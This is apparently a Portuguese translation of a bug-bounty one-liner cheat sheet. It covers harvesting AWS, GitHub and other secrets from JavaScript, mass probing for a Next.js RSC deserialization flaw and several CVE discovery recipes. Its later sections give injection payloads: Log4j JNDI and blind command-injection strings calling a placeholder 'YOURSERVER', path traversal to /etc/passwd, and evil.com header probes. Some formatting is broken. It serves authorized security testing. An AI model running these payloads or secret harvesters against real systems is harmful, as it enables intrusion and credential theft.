cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '"'"'"'['"'"'"]' | sed 's/["'"'"']//g' | sort -u | grep -E "^/" | grep -vE ".(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt

root@kitploit:~
> Extrai todos os caminhos relativos de API de JavaScript, filtra ativos estáticos

#### ⚡ 3. AWS Keys Hunter em Arquivos JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt

Caça por IDs de Chave de Acesso AWS (padrões AKIA, ABIA, ACCA, ASIA)

⚡ 4. Extrator de Chaves de API do Google + URLs do Firebase```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+.firebaseio.com|[a-z0-9-]+.firebaseapp.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt

root@kitploit:~
> Extrai chaves de API do Google e URLs de banco de dados/aplicativo Firebase

#### ⚡ 5. S3 Bucket Discovery in JavaScript```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'

Encontra buckets S3 em JS e valida acessibilidade

⚡ 6. Vazamento de Endereços IP Internos```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}|172.(1[6-9]|2[0-9]|3[01]).[0-9]{1,3}.[0-9]{1,3}|192.168.[0-9]{1,3}.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt

root@kitploit:~
> Descobre endereços IP internos/privados vazados em JavaScript (10.x, 172.16-31.x, 192.168.x)

#### ⚡ 7. Webhooks do Slack + Tokens do Discord em JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt

Extrai URLs de webhook do Slack e tokens de bot do Discord

⚡ 8. Detecção de Tokens do GitHub e Chaves Privadas```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt

root@kitploit:~
> Encontra tokens de acesso pessoal do GitHub (todos os formatos) e cabeçalhos de chave privada

#### ⚡ 9. Endereços de E-mail + Subdomínios Ocultos em JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt

Extrai endereços de e-mail e subdomínios ocultos referenciados em JavaScript

⚡ 10. Pipeline Completo de Reconhecimento JS (Tudo-em-Um)```bash

TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE ".js(?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"

root@kitploit:~
> Complete JS recon pipeline: discovers JS files, downloads all, extracts AWS/Google/GitHub keys and API endpoints

> **🎯 Dica Profissional:** Use `nuclei -t exposures/tokens/` nos segredos descobertos para validar se estão ativos!

---

## 🆕 Oneliners 2024-2025

### ⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - CRÍTICO) ⚡🔥⚡

> **💀 RCE crítico em React Server Components e Next.js - Sob exploração ativa! Adicionado ao CISA KEV 💀**

#### ⚡ Detectar aplicativos Next.js (Recon primeiro)```bash
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

⚡ Verificar se o Next-Action Header é Aceito```bash

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

root@kitploit:~
#### ⚡ Detecção em Massa - Next-Action Header Aceito```bash
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

⚡ Criar Arquivos de Payload para Testes```bash

Create payload.json (safe math check - no RCE)

echo '{"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{"then":"$B0"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

root@kitploit:~
#### ⚡ Verificação Manual de Vulnerabilidade com cURL```bash
curl -X POST https://target.com -H "Next-Action: check" -F "[email protected]" -F "[email protected]" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

⚡ Comando único: Pipeline Completo de Detecção```bash

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

root@kitploit:~
#### ⚡ Detectar Cabeçalhos de Resposta Vulneráveis```bash
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

⚡ Scan em massa com httpx + Next-Action Probe```bash

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

root@kitploit:~
#### ⚡ Shodan Dork para Alvos Next.js```bash
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

⚡ Verificação de Template do Nuclei```bash

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

root@kitploit:~
#### ⚡ Encontre e Teste - One-liner Completo```bash
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

⚡ Verificar RSC Endpoint Diretamente```bash

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

root@kitploit:~
#### ⚡ Teste em lote a partir de arquivo com paralelismo```bash
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

⚠️ Afetado: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Correção: Atualize para React 19.0.1/19.1.2/19.2.1

🎯 Detecção Chave: Aplicações que aceitam o cabeçalho Next-Action + desserialização RSC = Potencial RCE


🆕 Descoberta de One-Liners para CVE de Fevereiro de 2026

🔍 One-liners focados em reconhecimento para detectar vulnerabilidades críticas de fevereiro de 2026

⚠️ Nota: Alguns one-liners referenciam caminhos de nuclei-templates que podem ainda não existir na sua cópia local. Execute nuclei -update-templates primeiro e verifique se o template existe (ls ~/nuclei-templates/...) antes de executar. Sempre confirme os detalhes do CVE com o advisory oficial e mantenha-se dentro do seu escopo autorizado.

⚡ Descoberta do Cisco Catalyst SD-WAN - CVE-2026-20127

Vulnerabilidade crítica (CVSS 10.0) que permite bypass de autenticação no Cisco SD-WAN Manager/Controller. Explorada desde 2023 por atores de ameaças avançados. Detectar instâncias vulneráveis é crucial para proteger infraestrutura crítica.

1. Descubra instâncias Cisco SD-WAN Manager/vManage expostas via Shodan```bash

shodan search "title:"Cisco vManage" port:8443,443" --fields ip_str,port,org,isp,asn --separator " | " | tee cisco-sdwan-targets.txt

root@kitploit:~
---

### ⚡ Microsoft Azure Functions - Descoberta de CVE-2026-21532

> **Vulnerabilidade de divulgação de informações (CVSS 8.2) no Azure Functions que permite a exposição de credenciais e configurações sensíveis sem autenticação. Identificar endpoints vulneráveis é essencial para evitar vazamento de segredos.**

#### 1. Enumerar endpoints do Azure Function com nuclei```bash
cat domains.txt | httpx -silent | nuclei -t ~/nuclei-templates/http/exposures/apis/azure-function-key.yaml -t ~/nuclei-templates/http/exposures/tokens/ -o azure-functions-exposed.txt

⚡ Gradio Framework - CVE-2026-28414 Descoberta de Path Traversal

Path traversal crítico (CVSS 7.5) no Gradio <6.7 executando no Windows com Python 3.13+. Permite leitura arbitrária de arquivos. Detectar versões vulneráveis é vital para proteger aplicações de ML/IA.

1. Identificar aplicações Gradio vulneráveis e detectar a versão```bash

echo "https://target.com" | httpx -silent -tech-detect -json | jq -r 'select(.technologies[]? | select(.name=="Gradio")) | "(.url) - (.technologies[] | select(.name=="Gradio").version // "unknown")"'

root@kitploit:~
---

### ⚡ Gradio Framework - Descoberta de SSRF CVE-2026-28416

> **SSRF de alta gravidade (CVSS 8.2) no Gradio <6.6.0 que permite acesso a serviços de metadados de nuvem (AWS/GCP/Azure). Crucial para evitar o comprometimento de credenciais de nuvem.**

#### 1. Descubra instâncias do Gradio via Google Dorks e fingerprinting```bash
echo "inurl:/gradio/ OR intitle:\"Gradio\"" | gau --subs --threads 10 | httpx -silent -status-code -title -tech-detect | grep -i gradio | tee gradio-instances.txt

⚡ Fortinet FortiOS - CVE-2026-25815 Descoberta de Credenciais LDAP

Vulnerabilidade de divulgação de credenciais LDAP no FortiOS ≤7.6.6 devido a uma chave de criptografia padrão fraca. Explorada ativamente desde dezembro de 2025. Detectar versões vulneráveis é crítico.

1. Identificar FortiGate/FortiOS vulneráveis via Shodan com versão```bash

shodan search "product:FortiOS" --fields ip_str,version,port,org --separator " | " | awk -F'|' '$2 ~ /^[1-6].|7.[0-5].|7.6.[0-6]/ {print $1 " | Version:" $2 " | " $4}' | tee fortios-vulnerable.txt

root@kitploit:~
---

### ⚡ Dell RecoverPoint for VMs - CVE-2026-22769 Descoberta

> **Credenciais fixas críticas (CVSS 10.0) no Dell RecoverPoint <6.0.3.1 HF1. Permite acesso root remoto. Explorado por grupos APT chineses desde 2024. Detecção urgente necessária.**

#### 1. Detectar Dell RecoverPoint exposto e identificar o Tomcat Manager```bash
shodan search "title:\"RecoverPoint\" http.favicon.hash:-1153767654" --fields ip_str,port,http.title,version --separator " | " | anew dell-recoverpoint-targets.txt

⚡ Windows Shell - CVE-2026-21510 Descoberta de Bypass de Segurança

Bypass do SmartScreen/Mark-of-the-Web (CVSS 8.8) no Windows 10/11. Permite execução de código através de links/atalhos maliciosos. Zero-day ativamente explorado. A identificação de sistemas vulneráveis é essencial.

1. Identificar endpoints do Windows expostos e versões vulneráveis via SMB```bash

nmap -p445 --script smb-os-discovery,smb-protocols --open -iL targets.txt -oG - | grep "Windows 10|Windows 11" | awk '{print $2}' | tee windows-vulnerable-hosts.txt

root@kitploit:~
---

### ⚡ Statamic CMS - CVE-2026-28426 Descoberta de XSS

> **XSS armazenado crítico (CVSS 8,7) no Statamic <5.73.11 e <6.4.0 através de modelos SVG/PDF e Antlers. Permite escalonamento de privilégios. Detectar versões vulneráveis protege os Painéis de Controle.**

#### 1. Descobrir sites Statamic e extrair a versão do CMS```bash
echo "Powered by Statamic" | gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico | httpx -silent -tech-detect -status-code | grep -i statamic | nuclei -t ~/nuclei-templates/technologies/statamic-detect.yaml -o statamic-sites.txt

⚡ Chartbrew - CVE-2026-27005 Descoberta de Injeção SQL

Injeção SQL crítica não autenticada (CVSS 9.8) no Chartbrew <4.8.3. Permite leitura/modificação de dados em MySQL/PostgreSQL conectados. Detectar instâncias vulneráveis é urgente.

1. Identifique instâncias Chartbrew expostas e verifique a versão via API```bash

cat web-apps.txt | httpx -silent -path /api/health -mc 200 -json | jq -r 'select(.body | contains("chartbrew")) | "(.url) - Version: (.body | fromjson | .version // "unknown")"' | tee chartbrew-instances.txt

root@kitploit:~
---

### ⚡ Chartbrew - CVE-2026-25887 MongoDB RCE Discovery

> **RCE via injeção de consulta MongoDB (CVSS 7.2) no Chartbrew <4.8.1. Permite a execução arbitrária de JavaScript no servidor MongoDB. Crucial detectar instâncias vulneráveis antes da exploração.**

#### 1. Enumere os endpoints do Chartbrew enquanto escaneia APIs vulneráveis```bash
subfinder -d target.com -silent | httpx -silent | gau --subs | grep -E "chartbrew|/api/.*chart|/api/.*connection" | httpx -silent -status-code -title -tech-detect | grep -i "chartbrew\|mongo" | anew chartbrew-mongodb-endpoints.txt

⚡ Apache Camel - CVE-2026-31650 Descoberta de Injeção de Cabeçalho

Injeção crítica de cabeçalho (CVSS 9.1) no Apache Camel <4.9.2 que permite bypass de filtro via manipulação de cabeçalho HTTP (CamelExec*). Detectar endpoints Camel expostos protege pipelines de integração empresarial.

1. Descubra endpoints do Apache Camel e teste o bypass de injeção de cabeçalho```bash

cat urls.txt | httpx -silent -H "CamelExecCommandExecutable: id" -H "CamelExecCommandArgs: -la" -mc 200 -match-string "uid=" | anew camel-header-injection.txt

root@kitploit:~
---

### ⚡ Jenkins CI - CVE-2026-30170 Descoberta de RCE no Script Console

> **RCE via Script Console (CVSS 9.8) no Jenkins <2.503 com autenticação fraca ou anônima habilitada. Permite execução arbitrária de Groovy. A identificação de instâncias expostas é urgente para proteger CI/CD.**

#### 1. Identificar Jenkins expostos e verificar se há um Script Console acessível```bash
subfinder -d target.com -silent | httpx -silent -path /script -mc 200 -title -match-string "Script Console" | anew jenkins-script-console-exposed.txt

⚡ Descoberta de Vazamento de Schema via Introspecção GraphQL - CVE-2026-29812

Divulgação de informações (CVSS 7.5) via introspecção deixada habilitada em produção. Permite mapeamento completo do schema, mutações e tipos sensíveis. Detectar endpoints com introspecção aberta acelera o mapeamento da superfície de ataque.

1. Descubra endpoints GraphQL e detecte introspecção habilitada```bash

cat urls.txt | grep -Ei "graphql|/api" | httpx -silent -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' -mc 200 -match-string "__schema" | anew graphql-introspection-open.txt

root@kitploit:~
---

### ⚡ Ollama AI - CVE-2026-32154 Descoberta de Path Traversal em Modelo

> **Path traversal (CVSS 8.6) no Ollama <0.5.9 através da API `/api/pull` que permite escrita arbitrária de arquivos por meio de nomes de modelo maliciosos. Detectar instâncias expostas do Ollama protege a infraestrutura local de IA.**

#### 1. Identificar servidores Ollama expostos e enumerar modelos carregados```bash
shodan search "product:Ollama port:11434" --fields ip_str,port,org --separator " | " | awk -F'|' '{print "http://"$1":11434/api/tags"}' | httpx -silent -mc 200 -json | jq -r '.url + " | " + (.body // "")' | anew ollama-exposed-instances.txt

⚡ Spring Boot Actuator - CVE-2026-33001 Env Endpoint Exposure Discovery

Exposição de segredos (CVSS 8.2) através de um endpoint não protegido /actuator/env no Spring Boot. Vaza credenciais de banco de dados, tokens e chaves de API. A detecção em massa de actuators abertos é fundamental para prevenir vazamentos.

1. Descubra endpoints expostos do Spring Actuator e extraia variáveis sensíveis```bash

cat hosts.txt | httpx -silent -path /actuator/env -mc 200 -json | jq -r 'select(.body | test("password|secret|token|key";"i")) | .url' | anew spring-actuator-env-leak.txt

root@kitploit:~
---

### Nuclei DAST XSS```bash
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Massa```bash

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

root@kitploit:~
### Configuração Incorreta de CORS```bash
cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt

Injeção de Cabeçalho de Host```bash

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

root@kitploit:~
### Injeção CRLF```bash
cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Poluição de Protótipo```bash

cat js.txt | xargs -I@ curl -s @ | grep -E "(proto|constructor.prototype)" | anew proto_pollution.txt

root@kitploit:~
### Detecção de Envenenamento de Cache```bash
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

IDOR Pattern Detection```bash

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

root@kitploit:~
### URLs de Condição de Corrida```bash
cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

Endpoints WebSocket```bash

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

root@kitploit:~
### Atravessamento de Caminho```bash
cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

Detecção de XXE```bash

cat urls.txt | grep -iE ".(xml|soap)" | qsreplace ']>&xxe;'

root@kitploit:~
### Varredura Log4j```bash
cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

Injeção Cega de Comandos```bash

cat urls.txt | qsreplace "`curl YOURSERVER`" | httpx -silent cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

root@kitploit:~
### Captura de Tela em Massa```bash
cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Detecção de Tecnologia```bash

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

root@kitploit:~
### Hash do Favicon (Shodan)```bash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Painéis de Administração Expostos```bash

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

root@kitploit:~
### Endpoints de Depuração```bash
cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators```bash

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

root@kitploit:~
### Enumeração do WordPress```bash
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Modo de Depuração do Laravel```bash

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

root@kitploit:~
### Depuração do Django```bash
cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

HTTP Request Smuggling```bash

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

root@kitploit:~
### Verificação de CSP Bypass```bash
cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Subdomínio a partir do Favicon```bash

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

root@kitploit:~
---

## 🔍 Mecanismos de Busca para Hackers

| Mecanismo | Link | Descrição |
|:---------:|:----:|:---------:|
| **Shodan** | [shodan.io](https://shodan.io) | Busca de IoT e dispositivos |
| **Censys** | [censys.io](https://censys.io) | Dados de varredura da internet |
| **Fofa** | [fofa.info](https://en.fofa.info) | Busca no ciberespaço |
| **ZoomEye** | [zoomeye.org](https://zoomeye.org) | Mapeamento do ciberespaço |
| **Hunter** | [hunter.how](https://hunter.how) | Descoberta de ativos |
| **Netlas** | [netlas.io](https://netlas.io) | Superfície de ataque |
| **GreyNoise** | [greynoise.io](https://viz.greynoise.io) | Scanners da internet |
| **Onyphe** | [onyphe.io](https://onyphe.io) | Defesa cibernética |
| **CriminalIP** | [criminalip.io](https://criminalip.io) | Inteligência de ameaças |
| **FullHunt** | [fullhunt.io](https://fullhunt.io) | Superfície de ataque |
| **Quake** | [quake.360.net](https://quake.360.net) | Busca no ciberespaço |
| **Leakix** | [leakix.net](https://leakix.net) | Detecção de vazamentos |
| **URLScan** | [urlscan.io](https://urlscan.io) | Análise de URLs |
| **DNSDumpster** | [dnsdumpster.com](https://dnsdumpster.com) | Recon de DNS |
| **crt.sh** | [crt.sh](https://crt.sh) | Busca de certificados |
| **SecurityTrails** | [securitytrails.com](https://securitytrails.com) | Histórico de DNS |
| **Pulsedive** | [pulsedive.com](https://pulsedive.com) | Inteligência de ameaças |
| **VirusTotal** | [virustotal.com](https://virustotal.com) | Análise de arquivos/URLs |
| **PublicWWW** | [publicwww.com](https://publicwww.com) | Busca em código-fonte |
| **Grep.app** | [grep.app](https://grep.app) | Busca em código do GitHub |

---

## 📖 Wordlists Recomendadas

| Wordlist | Link | Caso de Uso |
|:---------|:----:|:-----------:|
| **SecLists** | [GitHub](https://github.com/danielmiessler/SecLists) | Tudo |
| **FuzzDB** | [GitHub](https://github.com/fuzzdb-project/fuzzdb) | Fuzzing |
| **Assetnote** | [wordlists.assetnote.io](https://wordlists.assetnote.io) | Conteúdo web |
| **OneListForAll** | [GitHub](https://github.com/six2dez/OneListForAll) | Combinado |
| **jhaddix all.txt** | [GitHub](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) | Diretórios |
| **commonspeak2** | [GitHub](https://github.com/assetnote/commonspeak2-wordlists) | Mundo real |

---

## 📚 Recursos de Aprendizado

### Livros
- Web Application Hacker's Handbook
- Real-World Bug Hunting by Peter Yaworski
- Bug Bounty Bootcamp by Vickie Li

### Plataformas
- [HackerOne](https://hackerone.com)
- [Bugcrowd](https://bugcrowd.com)
- [Intigriti](https://intigriti.com)
- [YesWeHack](https://yeswehack.com)

### Prática
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [PentesterLab](https://pentesterlab.com)
- [HackTheBox](https://hackthebox.com)
- [TryHackMe](https://tryhackme.com)

### Blogs e Recursos
- [PortSwigger Research](https://portswigger.net/research)
- [ProjectDiscovery Blog](https://blog.projectdiscovery.io)
- [Assetnote Blog](https://blog.assetnote.io)

---

## 🙏 Agradecimentos Especiais

<div align="center">

| Hunter | Hunter | Hunter |
|:------:|:------:|:------:|
| [@bt0s3c](https://twitter.com/bt0s3c) | [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) | [@stokfredrik](https://twitter.com/stokfredrik) |
| [@Jhaddix](https://twitter.com/Jhaddix) | [@TomNomNom](https://twitter.com/TomNomNom) | [@NahamSec](https://twitter.com/NahamSec) |
| [@zseano](https://twitter.com/zseano) | [@pry0cc](https://twitter.com/pry0cc) | [@pdiscoveryio](https://twitter.com/pdiscoveryio) |
| [@jeff_foley](https://twitter.com/jeff_foley) | [@haaborern](https://twitter.com/haaborern) | [@0xacb](https://twitter.com/0xacb) |

</div>

---

## 🤝 Como Contribuir

<div align="center">

Aceitamos contribuições da comunidade! Sua experiência torna este repositório melhor.

[![Contributors](https://img.shields.io/github/contributors/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=blue)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/graphs/contributors)
[![Pull Requests](https://img.shields.io/github/issues-pr/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=green)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/pulls)
[![Issues](https://img.shields.io/github/issues/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=orange)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/issues)

</div>

### 💡 Como Contribuir

<details>
<summary><b>📝 Clique para ver as diretrizes de contribuição</b></summary>

<br>

1. **Fork o Repositório**   ```bash
   git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git
   cd KingOfBugBountyTips
  1. Criar uma Nova Branch ```bash git checkout -b feature/your-contribution

    root@kitploit:~
  2. Adicione Seu Conteúdo

    • Adicione novos one-liners com documentação adequada
    • Inclua referências de fonte e explicações
    • Siga o formato e a estrutura existentes
  3. Envie um Pull Request

    • Escreva uma descrição clara das suas alterações
    • Referencie quaisquer issues relacionadas
    • Aguarde a revisão e o feedback

✨ O que Contribuir

  • 🎯 Novos one-liners e técnicas de bug bounty
  • 🔧 Guias e dicas de instalação de ferramentas
  • 📚 Recursos e referências adicionais
  • 🐛 Correções de bugs e melhorias
  • 📖 Aprimoramentos na documentação
  • 🌐 Traduções para outros idiomas
Stars
Estrelas
Forks
Forks
Watchers
Observadores
Contributors
Contribuidores

📈 Gráfico de Crescimento

Gráfico de Histórico de Estrelas

RecursoLink
🏠 Página InicialKing of Bug Bounty Tips
🛠️ KingRecon DODFerramenta de Recon Automatizado
🐧 BugBuntu OSBaixar Aqui
📺 Canal do YouTubeOFJAAAH
💬 Grupo TelegramJunte-se à Comunidade
🐦 Twitter/X@ofjaaah
💼 LinkedInConectar
🐛 Reportar ProblemasIssues do GitHub
🔐 Problemas de SegurançaAviso de Segurança